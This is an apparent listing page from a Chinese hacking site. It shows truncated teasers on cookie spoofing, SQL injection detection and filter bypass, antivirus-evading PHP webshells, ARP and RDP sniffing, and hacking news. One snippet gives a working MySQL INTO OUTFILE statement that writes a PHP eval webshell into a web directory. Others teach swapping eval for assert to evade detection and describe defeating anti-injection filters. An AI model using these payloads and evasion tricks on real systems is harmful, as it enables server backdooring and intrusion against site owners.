php 源码审计之 cookies 欺骗
ebycms是一套手机音乐cms系统 直接上代码 admin目录下的in.php <?php require_once('L:/wamp/www//fern.php'); Annotation("L:\wamp\www\eby\admin\in.php_0"); define(EBY_IN,TRUE); define('ADMIN_ROOT', str_replace("\","/",dir...
win7防火墙的日志
常见的操作很多网站都有介绍,这里介绍一个容易忽略的地方。 1 开启日志: 可以在防火墙界面设置,但是是以组策略中标准的,也就是说,如果在组策略中设置后,在防火墙界面是不能修改的。方法是右键找属性。【打开组策略方法:cmd下输入:Gpedit.msc】在windows配置的安全配置下找到windows防火墙对应设置项,然后右键,选择属性: 可以分三个域来设置:最放松的应该是域(企业网),其次是专用,...
黑客曝联通“10010短信”漏洞 被指易遭诈骗利用
昨日(2月21日)有黑客爆料称中国联通客服系统存有巨大漏洞。一般情况下联通10010号码只发一些套餐使用情况和充值成功与否的提示短信,但昨日有网友利用该漏洞自行发布来源为“10010”的短信并进行了展示。此消息引发数家安全软件厂商发出“安全预警”,提示消费者警惕冒充联通客服的欺诈短信。 可随意发送“10010”来源短信 《每日经济新闻》记者昨日联系上了一位不愿意透露姓名的黑客,对方表示,一个名为“...
Mysql 注入判断的一点思路
有时候我们注入的时候很难用and 1=1和 and 1=2来判断是否存在注入。。特别是像宽字节注入这种。。就比如说搜索型注入吧。。当存在宽字节注入时我们加上了%d5这样的。。数据库是查不到的。 这是我们就可以用延迟注入来判断 (当然or语句应该也是可以的,只是一点思路) 比如: word=%d5%27 and 1=1%23 word=%d5%27 and 1=2%23 是判断不出是否存在注入的,因...
突破 Sql 防注入过滤程序继续注入的一点方法
现在网上流传很多防注入代码。这些真的有用吗?这是在网上找的一个防注入代码 例如: ''''--------定义部份------------------ Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr ''''自定义需要过滤的字串,用 "|" 分隔 Fy_In = "''''|;|and|exec|insert|select|delete|u...
避开eval关键字,打造免杀一句话木马
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢? 首先我想到的是将eval从字符串类型赋给一个变量。 如:$func = 'phpinfo'; $func(); 这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果...
黑客组织Anonymous威胁要干掉整个互联网
著名黑客组织Anonymous一直对美国新的反盗版发案"SOPA"持强烈反对态度,不过这次他们玩得过火了。该组织最近威胁要干掉整个互联网以给 “SOPA法案,华尔街及黑心银行家,前者的保护伞政府”等一点颜色看看,如果代号名为"Operation Global Blackout"的行动成功,那么全世界将在3月31日陷入无法使用互联网的状态。 至于具体手段,Anonymous计划对所有13台DNS域名...
小笔记,root权限导出一句话语句
随便一个库执行: Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[dead])?>'); select cmd from a into outfile 'D:\www.webshell.cc.php'; Drop TABLE IF EXISTS xiaoma; 创建表A...
hack58被黑过程与嗅探、劫持、3389、rdp 协议的经验技巧总结
很多人对嗅探3389(远程桌面rdp协议)这一块,还是似懂非懂的,我就写了个总结文章,整理一下各种嗅探、劫持3389的方法,以及一些技巧经验大全,大杂烩,我尽量写得思路清晰一点,容易理解。 ------------------------------------------------------------------------------- 利用 Arp 欺骗、劫持、嗅探的方法: 0、直接使...
希腊黑客因为Anonymous攻击事件被捕
三名希腊青少年因攻击和丑化政府网站被逮捕和指控。 事情发生在二月初,三人被控在希腊网站In.gr上使用抗议言论丑化希腊司法部。他们称政府偏袒银行和欧盟,却让人民为他们的错误埋单,他们还支持希腊政府所限制的反假冒贸易协议(ACTA)。 In.gr的报告称三人年龄为16,17,18.为Greek Hacking Scene (GHS) 成员。 2月13号,希腊再次发生数起黑客袭击事件。